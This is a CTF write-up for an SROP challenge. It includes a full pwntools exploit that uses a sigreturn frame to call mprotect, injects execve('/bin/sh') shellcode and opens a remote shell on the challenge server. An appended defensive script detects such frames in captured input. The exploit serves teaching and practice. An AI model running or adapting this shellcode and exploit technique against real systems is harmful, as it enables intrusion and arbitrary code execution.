This is a basic SROP (sigreturn-oriented programming) challenge.
All mitigations are disabled:
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
Using a sigreturn frame, call mprotect to give the text segment rwx permissions and then have the program read input again.
Point the destination of that second read into the text segment and overwrite it with shellcode.
```python
#!/usr/bin/env python
from pwn import *
import time

context(log_level='debug', arch="amd64")
remote_flag = True
if not remote_flag:
    s = process("/home/jhong/Desktop/syscaller")
else:
    # chal1.swampctf.com 1999
    s = remote("chal1.swampctf.com", 1800)
binary = ELF("syscaller")
target = 0x400000                         # start of the text segment (no PIE)
shell3 = b"\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

frame = SigreturnFrame(kernel="amd64")    # CREATING A SIGRETURN FRAME
frame.rax = 10                            # SET RAX TO MPROTECT SYSCALL NUMBER
frame.rdi = target                        # SET RDI TO TEXT ADDRESS
frame.rsi = 2000                          # SET RSI TO SIZE
frame.rdx = 7                             # SET RDX => RWX PERMISSION
frame.rsp = target + 0x120                # stack pointer after sigreturn, inside the text segment
frame.rip = 0x400104                      # SET RIP TO SYSCALL ADDRESS

# First stage: eight words of 15 (rt_sigreturn) so the syscall gadget returns into the frame,
# then the frame itself, followed by a NOP sled and the shellcode to fill the 0x200-byte read.
payload = p64(15) * 8
payload += bytes(frame)
payload += b"\x90" * (0x200 - len(payload) - len(shell3)) + shell3
# Second stage: once the text segment is rwx, the next read lands there, so send the shellcode again.
payload2 = b"\x90" * (0x200 - len(shell3)) + shell3
s.sendafter(b"Hello and welcome to the Labyrinthe. Make your way or perish.\n", payload)
time.sleep(10)
s.send(payload2)
s.interactive()
```
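As an added analysis example (not part of the original writeup), here is a decoder that scans a captured input for plausible amd64 sigreturn frames and reports the syscall each frame would perform, which is how an incident responder can recognise an SROP payload of the kind shown above. The field layout follows the kernel's rt_sigframe ucontext as pwntools' SigreturnFrame mirrors it; the sample payload is constructed, and the selector value 0x33 and the text range 0x400000-0x401000 are assumptions.

```python
import struct

# Field order of the amd64 rt_sigframe ucontext restored by rt_sigreturn
# (the same order pwntools' SigreturnFrame emits); every field is 8 bytes.
FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "reserved", "sigmask",
]
FRAME_LEN = 8 * len(FIELDS)          # 248 bytes
USER_CS = 0x33                       # assumed x86-64 user-mode code selector
SYSCALLS = {10: "mprotect", 15: "rt_sigreturn", 59: "execve"}

def build_frame(**regs):
    """Build a raw frame with the given registers (constructed sample data)."""
    values = dict.fromkeys(FIELDS, 0)
    values["csgsfs"] = USER_CS
    values.update(regs)
    return b"".join(struct.pack("<Q", values[name]) for name in FIELDS)

def decode_frame(buf, off):
    """Read one frame at byte offset `off` into a field -> value dict."""
    return dict(zip(FIELDS, struct.unpack_from("<%dQ" % len(FIELDS), buf, off)))

def find_srop_frames(payload, text_range):
    """Scan captured input for plausible sigreturn frames: 8-byte aligned,
    user cs selector, rip inside the binary's text, rax a known syscall.
    Each hit reports the syscall, its first three arguments and rsp/rip."""
    lo, hi = text_range
    hits = []
    for off in range(0, len(payload) - FRAME_LEN + 1, 8):
        f = decode_frame(payload, off)
        if f["csgsfs"] != USER_CS or not (lo <= f["rip"] < hi):
            continue
        if f["rax"] not in SYSCALLS:
            continue
        hits.append({"offset": off, "syscall": SYSCALLS[f["rax"]],
                     "rdi": f["rdi"], "rsi": f["rsi"], "rdx": f["rdx"],
                     "rsp": f["rsp"], "rip": f["rip"],
                     # mprotect asking for PROT_READ|PROT_WRITE|PROT_EXEC (7)
                     "rwx": f["rax"] == 10 and (f["rdx"] & 7) == 7})
    return hits

# Constructed sample mirroring the writeup's layout: eight 8-byte words of 15
# (rt_sigreturn) followed by a frame that calls mprotect(0x400000, 2000, 7).
SAMPLE = struct.pack("<8Q", *[15] * 8) + build_frame(
    rax=10, rdi=0x400000, rsi=2000, rdx=7, rsp=0x400120, rip=0x400104)
```

Running `find_srop_frames(SAMPLE, (0x400000, 0x401000))` reports a single frame at offset 64 that would make the text segment rwx; the same scan over captured stdin of a crashed service is a cheap SROP indicator.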